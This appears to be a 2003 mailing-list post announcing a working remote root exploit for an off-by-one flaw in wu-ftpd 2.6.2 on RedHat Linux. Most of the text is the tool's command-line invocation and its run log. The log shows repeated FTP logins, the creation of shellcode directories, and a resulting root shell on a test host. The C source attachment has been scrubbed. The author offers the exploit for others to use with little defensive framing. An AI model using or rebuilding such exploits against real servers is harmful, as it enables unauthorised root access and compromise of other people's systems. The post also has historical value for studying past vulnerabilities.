Message-ID: <20030804062219.10295.qmail@hackermail.com>
From: xploit at hackermail.com (dong-h0un U)
Subject: wu-ftpd-2.6.2 off-by-one remote exploit.
I succeeded on RedHat Linux (x86) wu-2.6.2(1), 2.6.2(2), 2.6.1, 2.6.0. (Most versions).
This is never fake.
An excellent advisory was already announced (2003/07/31):
http://isec.pl/vulnerabilities/isec-0011-wu-ftpd.txt
This information was very useful to me.
I'm thankful to them.
This works well on my server.
What if it doesn't work on your server?
There are various reasons why it may not work on other servers.
(For example, compiler version, operating system kind,
or a mistake in the shellcode's position, environment variables, etc ...)
I don't think about those. Exert your force. :-)
INetCop Security is poor now. They have a few servers.
* Exploit result:
--
bash$ cat /etc/redhat-release
Red Hat Linux release 6.1 (Cartman)
bash$ gcc -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
--
bash$ ./0x82-wu262 -htest.inetcop.org -ux82 -pmy_pass -n21 -t2
0x82-WOOoou~Happy_new - wu-ftpd v2.6.2 off-by-one remote exploit.
[*] Target: RedHat Linux 6.x Version wu-2.6.2(2) compile.
[+] address: 0x806aaf0.
[*] #1 Try, test.inetcop.org:21 ... [ OK ]
[1] ftpd connection login.
[*] ftpd connection success.
[+] User id input.
[+] User password input.
[*] User x82 logged in.
[2] send exploit code.
[+] 01: make 0x41414141 directory.
[+] 02: make shell-code directory.
[+] 03: make 0x43434343 directory.
[+] 04: make 0x44444444 directory.
[+] 05: make 0x45454545 directory.
[+] 06: make 0x46464646 directory.
[+] 07: make 0x47474747 directory.
[+] 08: make 0x48484848 directory.
[+] 09: make 0x49494949 directory.
[+] 10: make 0x50505050 directory.
[+] 11: make 0x51515151 directory.
[+] 12: make 0x52525252 directory.
[+] 13: make 0x53535353 directory.
[+] 14: make 0x54545454 directory.
[+] 15: make 0x55555555 directory.
[+] Ok, MKD &shellcode_dir.
[+] #2 Try, test.inetcop.org:21 ... [ OK ]
[3] ftpd connection login.
[*] ftpd connection success.
[+] User id input.
[+] User password input.
[*] User x82 logged in.
[4] send exploit code.
[+] 01: make 0x41414141 directory.
[+] 02: make shell-code directory.
[+] 03: make 0x43434343 directory.
[+] 04: make 0x44444444 directory.
[+] 05: make 0x45454545 directory.
[+] 06: make 0x46464646 directory.
[+] 07: make 0x47474747 directory.
[+] 08: make 0x48484848 directory.
[+] 09: make 0x49494949 directory.
[+] 10: make 0x50505050 directory.
[+] 11: make 0x51515151 directory.
[+] 12: make 0x52525252 directory.
[+] 13: make 0x53535353 directory.
[+] 14: make 0x54545454 directory.
[+] 15: make 0x55555555 directory.
[+] Ok, RMD &shellcode_dir.
[5] Waiting, execute the shell ...
[*] Send, command packet !
x82 is happy, x82 is happy, x82 is happy
Linux test.inetcop.org 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
uid=0(root) gid=0(root) egid=501(x82) groups=501(x82),500(secure)
bash#
--
P.S.: Please don't mail me questions about the exploit.
Sorry for my poor English.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x82-wu262.c
Type: application/octet-stream
Size: 17692 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20030804/1bd3c730/0x82-wu262.obj